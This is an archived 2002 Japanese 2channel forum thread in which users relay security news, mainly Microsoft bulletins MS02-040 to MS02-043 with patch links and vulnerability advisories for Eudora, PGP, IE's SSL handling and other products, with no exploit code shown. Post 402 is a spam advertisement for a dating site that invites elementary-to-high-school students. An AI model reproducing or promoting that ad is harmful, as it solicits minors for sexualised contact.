【IT】マイクロソフト、セキュリティ・ベンダーのラックと提携
http://news2.2ch.net/test/read.cgi/newsplus/1027952496/

 マイクロソフトは7月29日,セキュリティ・ベンダーのラックと提携したことを明らかにした。
提携により,マイクロソフト製品のセキュリティ・ホール対応に協力してあたるとともに,
両社製品を組み合わせたセキュリティ・ソリューション,両社によるセキュリティ・セミナーを
提供していく。
(以上、2002年7月29日のITPro ニュースより一部引用―全文は引用元を参照)

引用元: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020729/1/

# うーむ、、、。
332名無しさん@お腹いっぱい。:02/07/30 01:44 ID:VbwAoz3F
なんか、最近MSは現実逃避してるっぽいよね。対応がさ。

「もうだめだー。カーネルからやり直しだー」と思ってるけど
「ちゃんとやってますから。ノートン博士いれときゃ大丈夫です」って言わなきゃいけないってーか
333むむむ ◆MUMUMU4w :02/07/30 23:26 ID:f4O6lCD8
■Windows XPのプログラムキーを装ったウイルス「QDel254」に注意

 日本ネットワークアソシエイツ株式会社は7月30日、WindowsXPのプロダクトキー生成
ツールを装ったウイルス「QDel254」に注意を促している。別名「DOAL(ドール)」。

 このウイルスは、ローカルハードディスクのファイルを削除するトロイの木馬型ウイルス。
Windows XP Home Edition のキー生成プログラムを装う特徴を持っている。WindowsXP
では違法コピー防止のため、プロダクトキーを入手する際にオンライン接続が必要。
そのため、違法コピーソフトを入手しようとする者に感染するおそれがある。
(以上、2002年7月30日のNet Securityより一部引用―全文は引用元を参照)

引用元: https://www.netsecurity.ne.jp/article/1/6144.html

334sp3:02/07/31 14:41 ID:fHMzIs/h
335むむむ ◆MUMUMU4w :02/07/31 22:41 ID:???
>>334
SP3出ましたか。日本版はいつでしょうね。

□□………………………………………………………………………………………………
□◆ Windows 2000 SP3の開発が完了
□□………………………………………………………………………………………………
 Windows 2000向けの次期サービス・パックとして開発が進められていたサービス・
パック3(SP3)の開発が完了したようだ。まだ正式に紹介するページは作られていな
いが,英語版に関してはすでにWebサイト上からダウンロードできるようになってい
る(該当サイト)。

http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020731/1/
336むむむ ◆MUMUMU4w :02/07/31 22:43 ID:nJ46MAcA
■ソフテック,最新のセキュリティ・ホール情報を取得して分かりやすく分析するソフト
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020730/3/
337むむむ ◆MUMUMU4w :02/08/01 11:08 ID:dKsMgbzL
■Microsoft Data Access Components にバッファオーバーフローの脆弱性(MS02-040)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-040ov.asp

MS02-040 に関する情報

「MS02-040: MDAC 機能の未チェックのバッファにより、SQL Server が
侵害される (Q326573)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる Microsoft Data Access Components (MDAC) に
含まれる未チェックのバッファにより、不正なプログラムが実行される可能性が
ある問題です。最悪の場合、悪意のあるユーザーによりお客様のコンピューター
上で任意のプログラムを実行される可能性があります。

対象となる製品
==============
・ Microsoft Data Access Components 2.5
・ Microsoft Data Access Components 2.6
・ Microsoft Data Access Components 2.7

修正プログラム
==============
・ MDAC 2.5
http://download.microsoft.com/download/dasdk/Patch/Q323264/W9XNT4/EN-US/Q323264_MDAC25_x86_en.exe
この修正プログラムは MDAC 2.5 Service Pack 2 を
実行しているシステムのみにインストールすることができます。

・ MDAC 2.6
http://download.microsoft.com/download/dasdk/Patch/Q323266/WIN98Me/EN-US/Q323266_MDAC26_x86_en.exe
この修正プログラムは MDAC 2.6 Service Pack 2 を
実行しているシステムのみにインストールすることができます。

・ MDAC 2.7
http://download.microsoft.com/download/dasdk/Patch/Q323263/W98NT42KMe/EN-US/Q323263_MDAC27_x86_en.exe
この修正プログラムは MDAC 2.7 Gold を実行しているシステムのみに
インストールすることができます。
338 :02/08/01 13:57 ID:ccRlHGqq
ハングル版の 266 従軍慰安婦について 2だ の946でパソコンが
やられてしっまった。 あれは、ウィルスですか。
339名無しさん@お腹いっぱい。:02/08/01 15:39 ID:???
信用できないドメインのexeをいきなり落とすなって……
340名無しさん@お腹いっぱい。:02/08/02 00:15 ID:5yzGthgs
>>336
ITProの最新情報で、2000SP3は今月9日、日本語版配布開始ってあったぞ
341名無しさん@お腹いっぱい。:02/08/02 00:18 ID:5yzGthgs
>>325
Windows Media Player 7.1
今すぐダウンロードする wm320920_71.exe - 1,423 Kb

しかし、実際落ちてきたのは1389KB。BitとByteの違い??

342名無しさん@お腹いっぱい。:02/08/02 02:04 ID:VpQYcJ8d
>>341
ファイルサイズを1000で割るか1024で割るかの違い。
343:02/08/02 10:41 ID:Aa9ZtlYl
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.233.192.0-202.233.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2000/05/11
[最終更新] 2001/01/23 16:51:10 (JST)
[email protected]
344名無しさん@お腹いっぱい。:02/08/02 10:43 ID:Aa9ZtlYl
↑富士通が折れのPCにアクセスしてくる
345むむむ ◆MUMUMU4w :02/08/02 11:42 ID:???
>>334-335 >>340
これですね。

日本語版Windows 2000 SP3の公開は8月9日
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020801/4/
346名無しさん@お腹いっぱい。:02/08/02 15:55 ID:Z8IVGFAx
347いつも名無し:02/08/03 01:09 ID:???
>346 いかにもなファイルですな
348名無しさん@お腹いっぱい。:02/08/03 17:49 ID:???
>>346
国際電話接続ソフトですか・・・(w
349名無しさん@お腹いっぱい。:02/08/03 22:06 ID:???
>>345

はいふって言われても
おじさんISDNだからこまっちゃうなぁ。

また、
オプション付けてダウンロードしないと、
インストーラーだけしかダウンロードできない奴なんですかネェ?
350むむむ ◆MUMUMU4w :02/08/04 23:18 ID:NqyOHE7z
■MozillaとOperaのftp viewにクロスサイトスクリプティングの脆弱性

さきほどBUGTRAQ-JPに流れた情報によると、

・Windows版Mozilla 1.0
・Windows版Opera 6.03
・Windows版Opera 6.04

対策は JavaScript を無効(オフ)にすること。なお Mozilla 1.1beta では対策済の模様。

詳細は以下のURLに掲載されているようです。
http://www.geocities.co.jp/SiliconValley/1667/advisory03.html
http://www.geocities.co.jp/SiliconValley/1667/advisory04.html
351むむむ ◆MUMUMU4w :02/08/04 23:19 ID:???
>>350
に、クロスサイトスクリプティングの脆弱性が存在するとのこと。

の行を入れ忘れました。スマソ。
352むむむ ◆MUMUMU4w :02/08/05 11:54 ID:3Iq1phV9
若干旧聞ですが。一応。

■『iPlanet』と『Netscape』、両サーバーソフトに脆弱性

『iPlanet Enterprise Web Server』と『Netscape Enterprise Server』の Web Publisher 機能
に、サーバーをブルートフォースアタック (総当たり型アカウント解析攻撃) に晒しかねない
脆弱性が発見された。

コンピュータ緊急対応センター (CERT/CC) が2日リリースした警告によると、サーバーが
HTTP ベーシック認証を利用するよう設定されている場合、攻撃者が繰り返し不正認証の
企てを行なう可能性があるという。

この脆弱性がもたらすリスクは HTTP ベーシック認証を利用した他のブルートフォース
アタックと変わらないが、予期しない攻撃手段の利用を許してしまう可能性もあると、
CERT は警戒を呼びかけている。

この脆弱性は、セキュリティ専門会社の ProCheckup が見つけたもの。『Windows NT』
ベースの OS 版の『iPlanet Web Server, Enterprise Edition』と『Netscape Enterprise
Server』に影響を及ぼすという。
(以上、2002年8月5日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020805/11.html
353名無しさん@お腹いっぱい。:02/08/05 15:20 ID:rV4Dhp2y
354むむむ ◆MUMUMU4w :02/08/05 16:44 ID:3Iq1phV9
■Eudora バージョン 5 for Windows に Buffer Overflow の問題

概要:
-----
QUALCOMM 社の Eudora バージョン 5 for Windows に Buffer Overflow の
問題を発見しました。悪意のある攻撃者に Eudora を実行するユーザの権限
で任意のコマンドを実行される可能性があります。

問題:
---
Eudora (開発元:米国QUALCOMM Inc., 日本語版開発製造元:株式会社クニ
リサーチインターナショナル)は Windows 95/98/2000/ME/NT 4.0 及び
MacOS 8.1 以上で動作する Mail User Agent です。

Eudora 5.x for Windows は、添付ファイルなど複数のパートで構成された
メールのパートの境界を示す boundary に、長い文字列を含むメールを読み
込んだ場合にバッファオーバーフローが発生します。我々の検証環境では任
意のコマンドを実行できることが確認できました。

問題を確認したバージョン:
-------------------------
Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) 日本語版
Eudora 5.1.1 for Windows (Sponsored Mode) 英語版

問題を確認したOS:
-----------------
Microsoft Windows 2000 Professional SP2 日本語版
Microsoft Windows 98 SE 日本語版

対策情報:
---------
Eudora の次期リリースで修正予定です。
次期リリースの出荷時期に関するベンダからの情報はありません。

発見と報告の経緯:
-----------------
(本文が長すぎる、と出たため略しました。発行元URLを参照ください)

発見者:
-------
三輪信雄 (LAC) [email protected]

免責:
-----
このアドバイザリで示される情報は予告なしに変更されることがあり、かつ、
あるがままの形で提供されます。この情報を適用し生起される結果のリスク
は利用者が負うものとし、株式会社ラックは一切の責任を負わないものとし
ます。

再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/55.html
355名無しさん@お腹いっぱい。:02/08/05 17:01 ID:dEuuDHht
356むむむ ◆MUMUMU4w :02/08/06 00:59 ID:IuqAcAwf
VC++もaffectedな模様なので、一応ここにも書いておきます。むむむ…。

Flaw in calloc and similar routines
http://cert.uni-stuttgart.de/advisories/calloc.php
357名無しさん@お腹いっぱい。:02/08/06 10:39 ID:tm/mEb3y
>>355
いれたほうがいいんかな。それ。
358名無しさん@お腹いっぱい。:02/08/06 11:41 ID:???
>>357
正式発表じゃないし、正式発表は8月9日だから待ったら。
359むむむ ◆MUMUMU4w :02/08/06 15:25 ID:3lc8X14c
セキュアWebシステム構築術 第十回:攻撃の証拠を保存し、安全なデータで復旧
http://www.itfrontier.co.jp/sec/directory/rensai/Nikkei0207.html
360のり:02/08/06 15:39 ID:???
マイクロソフト、ウィンドウズ情報開示へ
 【ニューヨーク5日共同】米マイクロソフトは5日、
米独占禁止法(反トラスト法)違反訴訟で米司法省な
どと昨年11月に合意した和解案の一部を実行し、パ
ソコンの基本ソフト(OS)「ウィンドウズ」と応用
ソフトとの接続に関する約300の技術情報を今月中
にも無料で開示すると発表した。

361むむむ ◆MUMUMU4w :02/08/06 18:08 ID:3lc8X14c
■脆弱性情報のデータベース化で専門家集団が結束

 ソフトの脆弱性やセキュリティツール、バグ関連の議論など、セキュリティに関する
情報を集めたデータベースの構築を目指し、ハッカーとセキュリティ専門家が結束した。

 この目標に向けて、独立した4つのプロジェクト――セキュリティ情報サイトの「Open
Source Vulnerability Database」、改ざん追跡サービスの「Alldas.de」、ソフトデータ
ベースの「PacketStorm」、および脆弱性監視サイトの「VulnWatch」――が緩やかな
コラボレーションとして組織化され、「Internetworked Security Information Service」
(ISIS)として活動することになる。
(以上、2002年8月6日のZDNet JAPANより一部引用―全文は引用元を参照)

引用元: http://www.zdnet.co.jp/news/0208/06/ne00_isis.html

VulnWatchやPacketStormには日頃からお世話になってるので、一応注目しておこう。

362むむむ ◆MUMUMU4w :02/08/06 19:12 ID:3lc8X14c
■シマンテックのファイアウォール製品に脆弱性、接続のハイジャックが可能

http://www.ubizen.com/c_about_us/2_public_relations/2002/020802_e.html (英語)
によると、以下の製品が affective な模様。

・Raptor Firewall
 Windows NT版6.5, Solaris版6.5.3、
・Symantec Enterprise Firewall
 Windows 2000, NT版6.5.2
 Solaris, Windows 2000およびNT版V7.0
・VelociRaptor
 500/700/1000/1100/1200/1300の各モデル
・Symantec Gateway Security
 5110/5200/5300の各モデル

対応版(英語版)は、シマンテックのダウンロード・サイト(下記)から
ダウンロード可能な模様。
http://securityresponse.symantec.com/
363むむむ ◆MUMUMU4w :02/08/08 11:08 ID:yqSxjiZZ
■Microsoft Content Management Server 2001に脆弱性(MS02-041)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-041ov.asp

MS02-041 に関する情報
「MS02-041: Content Management Server の未チェックのバッファにより、
サーバーが侵害される (Q326075)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによりお客様のコンピューター上で任意のプログラムを
実行される可能性があります。

対象となる製品
==============
・ Microsoft Content Management Server 2001

修正プログラム
==============
・ Microsoft Content Management Server 2001
http://download.microsoft.com/download/contentmanagementser/SP/1.0/NT5/EN-US/mcms2001srp1.exe
注意: Microsoft Content Management Server 2001 は英語版製品のみが
提供されております。
そのため、日本語版修正プログラムはございません。
364名無しさん@お腹いっぱい。:02/08/08 13:38 ID:w3asRpnl
.Net Framework SarvicePack2 ダウンロード可能
http://www.microsoft.com/japan/msdn/netframework/downloads/sp2/
365むむむ ◆MUMUMU4w :02/08/09 00:01 ID:uDWy1QVP
■Windows、Mac、Linuxに共通のセキュリティーホール

 セキュリティー専門家たちが、通信ソフトウェアに発見されたセキュリティーホールに
ついて警告を発した。Windows、『Mac OS X』、UNIXをベースにしたオペレーティング・
システム(OS)に加えて、『Kerberos』(ケルベロス)認証システムを実行しているコンピュー
ターが乗っ取られる危険性がある。
(以上、2002年8月9日のCNET Japan Tech Newsより一部引用―全文は引用元を参照)

引用元: http://japan.cnet.com/Enterprise/News/2002/Item/020808-1.html?me

ちょっと前から話題になっているRPC/XDRのセキュリティホールが、Kerberosにも
影響ある模様。で、KerberosはWindowsにも採用されてるので、Windowsにも影響
ある模様、とのこと。
366名無しさん@お腹いっぱい。:02/08/09 00:56 ID:???
367むむむ ◆MUMUMU4w :02/08/09 01:09 ID:uDWy1QVP
一応貼っておきます。

◆DCOM経由でデータが奪われる,Windowsの危険をツールで実証
 アクセスしたWebサイトの履歴やCookie,ブラウザ上で入力した検索語やパスワー
ドを盗む――。このような不正行為が簡単に実現可能であると実証するツールが登
場した。

続き(全文)は,
http://itpro.nikkeibp.co.jp/members/NBY/ITARTICLE/20020805/1/
でお読みいただけます。
368名無しさん@お腹いっぱい。:02/08/09 03:24 ID:???
>>367
ローカルで試してみますた。本当にダダ見えです(((( ;゚Д゚)))ガクガクブルブル
369名無しさん@お腹いっぱい。:02/08/09 07:59 ID:PDF3/tGT
ハーイ、日本語版SP3ですよぉ。
http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp

デバッグシンボルはいつも通りこっちね。
http://www.microsoft.com/ddk/debugging/symbolpkg.asp
370名無しさん@お腹いっぱい。:02/08/09 09:49 ID:???
>>369 ダウンロードしてみたが,もう使ってみた人いる?
なんかMSのサイト上にある日本語版ドキュメントはリンク切れだらけで
不気味なんだが...
371むむむ ◆MUMUMU4w :02/08/09 13:39 ID:1RD6PuWV
■Macromedia Shockwave Flashに「危険性大」のセキュリティホール
  Macromediaがパッチをリリース

情報元: http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0064.html
Macromediaのパッチ: http://www.macromedia.com/v1/handlers/index.cfm?ID=23293&Method=Full&Title=MPSB02%2D09%20%2D%20Macromedia%20Flash%20Malformed%20Header%20Vulnerability%20Issue&Cache=False

すべてのバージョンが危険で、リモートからコマンドが実行可能な模様。
372名無しさん@Emacs:02/08/09 13:47 ID:dEEmL2YD
>>370
正式リリース前からずっと使ってるけど、全く問題ナシ。
むしろ解決された障害のほうが多い。
373むむむ ◆MUMUMU4w :02/08/09 14:13 ID:1RD6PuWV
【PC】Googleツールバーにセキュリティホール、最新版に更新を
http://news2.2ch.net/test/read.cgi/newsplus/1028869715/

こちらにもコピペしておきます。

1 名前: ◆MUMUMU4w @むむむφ ★ 投稿日:02/08/09 14:08 ID:???
世界最大の検索エンジン Google の ツールバーに、悪意の攻撃を許しかねない欠陥が
あることがわかった。

問題があるのは、バージョン1.1.58およびそれより古いバージョンの Google ツールバー。
クラッカーから以下のような攻撃を受ける危険がある。

・全ての視覚設定オプションを自由に変更する。
・ツールバーを乗っ取って検索ルートを変更する。
・不正コマンドを実行する。
・ローカルファイルを読み取る。
・ツールバーの検索ボックスへの入力を盗聴する。
・プライバシー関連の機能を有効にする。
・ツールバーの履歴を消去する。
・ツールバーをアンインストールする。

Google は、この欠陥を発見した GreyMagic Software の提案を受けて、さっそく修正
バージョンを完成。7日からそれを Google ツールバーの自動更新機能を使って提供し
始めた。
(以上、2002年8月9日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020809/12.html
リクエスト: http://news2.2ch.net/test/read.cgi/newsplus/1028625378/750
攻撃例のデモサイト(英語): http://sec.greymagic.com/adv/gm001-mc/
374むむむ ◆MUMUMU4w :02/08/09 14:27 ID:1RD6PuWV
■WS_FTPにバッファオーバーフローの脆弱性

情報元: http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0063.html

以下、情報元より引用:
Recommendation:
Install the patch provided by Ipswitch:
ftp://ftp.ipswitch.com/ipswitch/product_support/WS_FTP_Server/ifs312.exe
For more info, see:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
375名無しさん@お腹いっぱい。:02/08/09 17:21 ID:ix6A7i7O
>>372
マジですか。
本日夜から当てまクリ。
376名無しさん@お腹いっぱい。:02/08/10 09:52 ID:???
良すれだな。セキュ板よりも役立つぞ。
377名無しさん@お腹いっぱい。:02/08/11 00:39 ID:???
ココとwin板の直リン倶楽部は定期的に見ちゃう。
378むむむ ◆MUMUMU4w :02/08/12 15:12 ID:JPV/sP3g
土・日と2chにアクセスしなかったので、古いネタでスマソ。

Windows版Apacheなどにセキュリティーホール
http://www.watch.impress.co.jp/internet/www/article/2002/0812/apa.htm

1.xは影響なし。2.xの方は、2.0.40への更新が必要。
379へろへろりん:02/08/12 15:39 ID:awKDTa+p
Windows2000のSP3をダウンロードしたら
SP1、SP2、その他修正モジュールは不要?
380むむむ ◆MUMUMU4w :02/08/12 15:43 ID:JPV/sP3g
>>379
別途適用が必要な修正プログラム

以下の修正プログラムは Windows 2000 Service Pack 3 に含まれていません。
影響を受ける可能性のあるお客様は、セキュリティ修正プログラムを確認し、適用して
ください。

MS01-022 (Q296441) - WebDAV Service Provider によりスクリプトがユーザーとして
リクエストを行う
MS02-008 (Q318202) - XMLHTTP コントロールにより、ローカル ファイルにアクセス
することができる

以上、下記URLより引用しました。

Windows 2000 SP3 日本語版
http://www.microsoft.com/japan/technet/security/news/W2kSP3.asp
381名無しさん@お腹いっぱい。:02/08/12 22:00 ID:???
age
382名無しさん@お腹いっぱい。:02/08/13 02:15 ID:???
>>380
いつもありがとう
383むむむ ◆MUMUMU4w :02/08/13 13:08 ID:OYSIaDlE
米マイクロソフト製品などにセキュリティ上の欠陥、情報漏えいの可能性=専門家

 [サンフランシスコ 12日 ロイター] 複数の専門家は、米マイクロソフトMSFT.O が
開発したブラウザー「インターネット・エクスプローラ」(IE)や別会社による汎用暗号化
ソフト「PGP」に、セキュリティ上の欠陥があると指摘している。同製品をネット上で使用
した場合、クレジットカードなどの個人情報が外部に漏れる可能性もある、という。

サンフランシスコに本拠を置きセキュリティの研究を行っているマイク・ベンハム氏は、
ネット上で品物などを購入する際、IEを使用すると提供した個人情報がネット上で傍受
されてしまう可能性があると指摘している。
(以上、2002年8月13日のREUTERS.CO.JPより一部引用―全文は引用元を参照)

引用元: http://www.reuters.co.jp/news_article.jhtml?type=technologynews&StoryID=1320260

とりあえず。もう少し具体的な情報があれば別途ここにでも。
384むむむ ◆MUMUMU4w :02/08/13 14:37 ID:OYSIaDlE
>>383
とりあえず原文。今時間がないので、誰か中身読んでもらえるとうれしい。

http://www.reuters.com/news_article.jhtml?type=search&StoryID=1320070
385むむむ ◆MUMUMU4w :02/08/13 15:38 ID:wTEgSc2I
■CiscoのVPNクライアントに複数の脆弱性

Cisco Security Advisory: Cisco VPN Client Multiple Vulnerabilities
http://www.cisco.com/warp/public/707/vpnclient-multiple-vuln-pub.shtml

より以下引用:
--引用開始
Affected Products
The VPN Client software program runs on the following platforms:

Microsoft Windows-based PC.
Red Hat Version 6.2 Linux (Intel), or compatible distribution, using kernel Version 2.2.12
or later. It does not support kernel Version 2.5.
Solaris UltraSPARC running a 32-bit kernel OS Version 2.6 or later.
Mac OS X Version 10.1.0 or later.
All VPN Client software programs, earlier than version 3.6 and earlier than version 3.5.4,
on all platforms are affected by this vulnerability. This includes the previous Cisco
Secure VPN Client and the the Cisco VPN 3000 Client software programs.

Cisco VPN 5000 Client software programs are not affected by this vulnerability.

No other Cisco product is currently known to be affected by this vulnerability.
--引用終了
386名無しさん@お腹いっぱい。:02/08/13 15:44 ID:cDF/Cs1q
日本IBM、「セキュリティー・オプション・パック」
http://www.zdnet.co.jp/enterprise/0208/09/n_08.html
387名無しさん@お腹いっぱい。:02/08/13 16:03 ID:cDF/Cs1q
夏休みだから再確認! ルータの設定
http://www.zdnet.co.jp/broadband/0208/13/router.html
388名無しさん@お腹いっぱい。:02/08/13 17:07 ID:Vd5/zlhk
むむむさんはマイクロソフトの人か?
389むむむ ◆MUMUMU4w :02/08/13 20:38 ID:OYSIaDlE
■PGPに脆弱性、メールが盗み見られる危険

セキュリティ研究者たちが、広く使われている暗号化ツール『PGP』(Pretty Good Privacy)
に脆弱性を発見した。これにより、重要な Eメールの中身が読まれてしまう可能性がある
という。

PGP は、インターネットの暗号化ツールのデファクトスタンダードで、まず破られることは
ないというのが大方の意見だ。ところが、セキュリティ企業 Counterpane Internet Security
Inc. と Columbia University の研究者たちが、PGP で暗号化されたメールに、スクランブル
を解かずに手を加える方法を発見したと述べた。
(中略)
この脆弱性の発見により、『OpenPGP』標準のアップデートが行なわれ、12日にはリリース
されることになっている。

また今回、別の暗号ツール『GnuPG』にも同様の脆弱性が見つかったが、こちらの場合、
データが暗号化の前に圧縮されていれば攻撃はかなり防げるという。

今回の脆弱性は「重大」に分類されるものの、これを悪用するのは非常に難しく、研究者
たちは PGP ユーザーに対し、返信の際、受信したメールのテキスト本文をそのまま残さ
ないよう呼びかけている。
(以上、2002年8月13日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020813/12.html
Counterpane Internet Security Inc.のアナウンス: http://www.counterpane.com/pgp-attack.pdf
390名無しさん@お腹いっぱい。:02/08/13 22:47 ID:h9JlSFwB
>むむむ ◆MUMUMU4w さまへ
ニュー速+でスレ立て依頼した者です。
詳しい続報をありがとうございます。
391むむむ ◆MUMUMU4w :02/08/14 00:19 ID:???
>>388
勤務中にスレ立てたりここにレスしたりしてる某株式会社の不良社員です。

>>390
どもです。
392むむむ ◆MUMUMU4w :02/08/14 02:08 ID:4ZMLoWZ9
さっき、CNN.comにこんな記事があるのを見つけました。
かなりいやんな感じ。今日はもう寝ますが、明日以降何か情報出るかも。

Microsoft investigates possible IE flaw
Security hole could allow access to private information

SEATTLE, Washington (AP) -- Microsoft is investigating claims that its popular
Internet Explorer software has a loophole that lets attackers pose as legitimate
Web site operators, potentially giving them access to computer users' names,
passwords and credit card numbers.

Although Microsoft said it's too soon to judge the severity of the problem -- and
even whether the flaw exists -- some programmers and consultants said it could
threaten the security of everything from online banking to e-commerce.

The problem is "fairly serious," said Elias Levy, a member of software security
company Symantec Corp.'s security response team. He said that the complexity
involved makes the probability of widespread attacks unlikely.
(以上、2002年8月14日のCNN.comより一部引用―全文は引用元を参照)

引用元: http://www.cnn.com/2002/TECH/internet/08/13/microsoft.security.ap/index.html
393むむむ ◆MUMUMU4w :02/08/14 14:43 ID:Dr5H5Dfy
>>392
japan.internet.comに日本語の記事が出た模様。

『IE』の最新の脆弱性は Eコマースの脅威か?
http://japan.internet.com/webtech/20020814/12.html
394むむむ ◆MUMUMU4w :02/08/14 20:09 ID:x71xzoxL
>>392-393
どうやら SSL の証明書の取り扱いに問題がある模様。

「IEのSSLに脆弱性」複数のセキュリティ専門家が報告

複数のセキュリティ専門家が、米マイクロソフトのブラウザ「Internet Explorer(IE)」にある
脆弱性を指摘している。SSL証明書の取り扱い方法に問題があり、信頼性のあるWebサイト
になりすまし、オンライン取引などを実行する当事者間の通信内容を読み取る
「man-in-the-middle」攻撃が可能という。
395むむむ ◆MUMUMU4w :02/08/14 20:14 ID:x71xzoxL
396名無しさん@お腹いっぱい。:02/08/14 20:22 ID:???
最近XPのバグが出ないのは、SP1で忙しいからでしょうか?
397名無しさん@お腹いっぱい。:02/08/15 04:44 ID:???
みんな穴兄弟
398名無しさん@お腹いっぱい。:02/08/16 02:51 ID:???
>>392-395
の問題ってエンドユーザー側ではどうしようもないからなあ・・・
あ、でもこんな記述あるね。

> 一方、Netscape にはこのような脆弱性はないとも述べている。

ということはオンラインショッピングではわざわざネスケ立ち上げた
方がいいのか・・・う〜ん。
399むむむ ◆MUMUMU4w :02/08/16 10:58 ID:n7szTnN2
■Windows2000の接続マネージャにセキュリティホール(MS02-042)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-042ov.asp

MS02-042 に関する情報
「MS02-042: 接続マネージャの問題により、権限が昇格する (Q326886)」 に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、Windows 2000 の接続マネージャに含まれる問題によって、
管理者と同等の権限を取得されてしまう問題です。最悪の場合、
悪意のあるユーザーにお客様のコンピュータ上で管理者と同等の操作を
行われる可能性があります。

対象となる製品
==============
・ Microsoft Windows 2000

修正プログラム
==============
・ Microsoft Windows 2000
・ PC/AT 互換機
http://download.microsoft.com/download/win2000platform/Patch/Q326886/NT5/JA/Q326886_W2K_SP4_X86_JA.exe
・ NEC PC-9800 シリーズ
http://download.microsoft.com/download/win2000platform/PatchNEC/Q326886/NT5/JA/Q326886_W2K_SP4_nec98_JA.exe
400むむむ ◆MUMUMU4w :02/08/16 10:59 ID:n7szTnN2
■Microsoft SQL Serverに対する累積的な修正プログラム(MS02-043)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-043ov.asp

MS02-043 に関する情報
「MS02-043: SQL Server 用の累積的な修正プログラム (Q316333) 」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、以下の製品に影響を及ぼすセキュリティ上の問題を
排除する累積的な修正プログラムです。

対象となる製品
==============
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000

修正プログラム
==============
・ Microsoft SQL Server 7.0、 Microsoft Desktop Engine (MSDE) 1.0
http://download.microsoft.com/download/sql70/Patch/7.00.1076/WIN98MeXP/JA/7.00.1076_jpn.exe
Microsoft SQL Server 7.0 Service Pack 4 の環境に
インストールすることが可能です。
・ Microsoft SQL Server 2000、 Microsoft Desktop Engine (MSDE) 2000
http://download.microsoft.com/download/SQLSVR2000/Patch/8.00.0667/W98NT42KMeXP/JA/8.00.0667_jpn.exe
Microsoft SQL 2000 Service Pack 2 の環境に
インストールすることが可能です。
401むむむ ◆MUMUMU4w :02/08/16 11:53 ID:n7szTnN2
>>392-395 の続報。どうやらIEではなくWindowsそのものの問題の模様。

--- 引用開始
----------------------------------------------------------------------
IEのSSL機能の脆弱性の原因はWindows
----------------------------------------------------------------------

 最近複数のセキュリティ専門家が、米マイクロソフトのInternet Explorer
(IE)ブラウザのSSL機能に脆弱性があると報告したが、同社は8月14日(米国
時間)、脆弱性があるのはIEではなく、複数バージョンのWindowsであること
を明らかにした。同社は、Windows 98/Me/NT4/2000/XP用のパッチを準備して
いる。

 「SSL機能の脆弱性はIEの問題とされているが、これはWindowsの問題だ。Windows
の暗号機能に脆弱性があるため、OSにパッチを当てなければならない。IEは、
あくまでOSの暗号サービスを利用する側だ」と、マイクロソフト・セキュリテ
ィ・レスポンス・センターのマネジャー、スコット・カルプ氏は語る。
(以上、2002年8月16日のcomputerworld.jpより一部引用―全文は引用元を参照)

引用元: http://www.computerworld.jp/contents/free/200208/20020815ms.html
402コギャルとHな出会い:02/08/16 11:58 ID:Zz0lgkdA
http://kado7.ug.to/net/


朝までから騒ぎ!!
   小中高生
 コギャル〜熟女まで
   メル友
  i/j/PC/対応

女性の子もたくさん来てね
  小中高生大歓迎です                 
全国デ−トスポット情報も有ります。
全国エステ&ネイル情報あります。

  激安携帯情報あります。
403名無しさん@お腹いっぱい。:02/08/16 17:21 ID:???
>>401 これ既出だったらごめん。

報告された Web セキュリティの脆弱性に関する情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/news/iarwsv.asp
404名無しさん@お腹いっぱい。:02/08/16 22:21 ID:h7Gu4NvO
接続マネージャの問題により、権限が昇格する (Q326886) (MS02-042)

登録日 : 2002/8/16
更新日 : 2002/8/16
脆弱性の影響 : 権限の昇格
最大深刻度 : 高
影響を受けるソフトウェア :
・ Microsoft Windows 2000
問題 :
技術的な説明 :
接続マネージャ (NCM: Network Connection Manager) はホスト システムにより
管理されるすべてのネットワーク接続に制御メカニズムを提供します。NCM の
機能の中に、ネットワーク接続が確立されている時、ハンドラ ルーチンを
呼び出すものがあります。
仕様上、このハンドラ ルーチンはユーザーのセキュリティ コンテキストで実行
される必要があります。しかし、ある問題により、非常に複雑なプロセスを
要しますが、特権を持たないユーザーが LocalSystem のセキュリティ
コンテキストでハンドラ ルーチンを実行できる可能性があります。攻撃者は
